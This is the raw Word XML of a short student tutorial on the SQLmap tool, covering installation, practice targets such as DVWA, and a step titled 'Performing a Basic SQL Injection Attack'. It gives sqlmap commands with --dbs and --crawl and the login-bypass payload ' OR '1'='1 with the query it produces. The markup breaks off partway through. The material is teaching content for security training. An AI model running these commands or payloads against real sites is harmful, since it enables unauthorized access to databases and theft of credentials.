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100A" w:rsidRDefault="00A55ECD" w:rsidP="00A55ECD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802D08" w:rsidRDefault="00802D08" w:rsidP="00A55ECD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00802D08" w:rsidRPr="00802D08" w:rsidRDefault="00BC659F" w:rsidP="00802D08">
      <w:pPr>
        <w:ind w:left="6237"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L.CHAITANYA SAI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802D08" w:rsidRPr="00802D08" w:rsidRDefault="00BC659F" w:rsidP="00802D08">
      <w:pPr>
        <w:ind w:left="6237"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GIET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="003F5C77" w:rsidRDefault="00A55ECD" w:rsidP="00A55ECD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="00E211DB" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -1 Purpose and Usage of </w:t>
      </w:r>
      <w:r w:rsidR="00BC659F" w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC659F" w:rsidRPr="00BC659F" w:rsidRDefault="00BC659F" w:rsidP="00BC659F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC659F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQLMap is primarily used to automate the process of detecting SQL injection vulnerabilities in web applications</w:t>
      </w:r>
      <w:r w:rsidR="00A55ECD" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRDefault="00BC659F" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC659F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Once a vulnerability is identified, SQLMap can enumerate information about the underlying database management system and extract da</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ta from the vulnerable database</w:t>
      </w:r>
      <w:r w:rsidR="00A55ECD" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC659F" w:rsidRPr="003F5C77" w:rsidRDefault="00BC659F" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC659F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This includes retrieving database schema information, dumping tables, and extracting sensitive data like usernames, passwords, and other information stored in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="00E211DB" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -2 Installation of SQLMap: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="003F5C77" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap is written in Python and can be easily installed on most operating systems. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00834CA8" w:rsidRDefault="00834CA8" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You can download SQLMap directly from its official GitHub repository. You can use Git to clone the repo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sitory or download the ZIP file</w:t>
      </w:r>
      <w:r w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://github.com/sqlmapproject/sqlmap.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="00834CA8" w:rsidRDefault="00834CA8" w:rsidP="00834CA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>f you have Python3 installed</w:t>
      </w:r>
      <w:r w:rsidR="00A55ECD" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can install SQLMap using the </w:t>
      </w:r>
      <w:r w:rsidR="00A55ECD" w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>foll</w:t>
      </w:r>
      <w:r w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">owing command: </w:t>
      </w:r>
      <w:r w:rsidR="00A55ECD" w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00565052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00834CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>python3 sqlmap.py</w:t>
      </w:r>
      <w:r w:rsidR="00565052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="00E211DB" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step -3 Identifying a Vulnerable Web Application:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="003F5C77" w:rsidRDefault="00565052" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00565052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>intentionally vulnerable applications designed for educational purposes, such as OWASP WebGoat or DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.This</w:t>
      </w:r>
      <w:r w:rsidRPr="00565052">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00565052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vulnerabilities for training and testing purposes.</w:t>
      </w:r>
      <w:r w:rsidR="00A55ECD" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRDefault="00565052" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We can u</w:t>
      </w:r>
      <w:r w:rsidRPr="00565052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tilize automated web vulnerability scanners like Burp Suite, OWASP ZAP, or Nessus. These tools can scan websites for common vulnerabilities such as SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00A55ECD" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00565052" w:rsidRPr="00565052" w:rsidRDefault="00565052" w:rsidP="00565052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">By combining manual exploration with automated scanning techniques, you can effectively identify vulnerable web applications for testing and security assessment purposes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="00E211DB" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -4 Performing a Basic SQL Injection Attack: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="003F5C77" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Use SQLMap to perform a basic SQL injection attack against the chosen target. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Example command: sqlmap -u "http://target.com/page.php?id=1" --dbs </w:t>
      </w:r>
      <w:r w:rsidR="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E211DB" w:rsidRDefault="00E211DB" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Explore the web application to find input fields where user input is directly incorporated into SQL queries without proper validation or sanitization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E211DB" w:rsidRPr="00E211DB" w:rsidRDefault="00E211DB" w:rsidP="00E211DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Enter a simple SQL injection payload into the "username" or "password" field. For example, entering ' OR '1'='1 as the username or password would modify the SQL query to become: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username='' OR '1'='1' AND password='$password'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="00E211DB" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E211DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="003F5C77" w:rsidRDefault="00A55ECD" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E31EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Syntax:</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u &lt;website_link&gt; --crawl=2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55ECD" w:rsidRPr="003F5C77" w:rsidRDefault="00AE5BA1" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sqlmap -</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">u </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="003F5C77">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> --crawl=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE5BA1" w:rsidRPr="003F5C77" w:rsidRDefault="00AE5BA1" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --batch </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>command for automatic response to yes/no questions while executing the commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE5BA1" w:rsidRPr="003F5C77" w:rsidRDefault="00AE5BA1" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
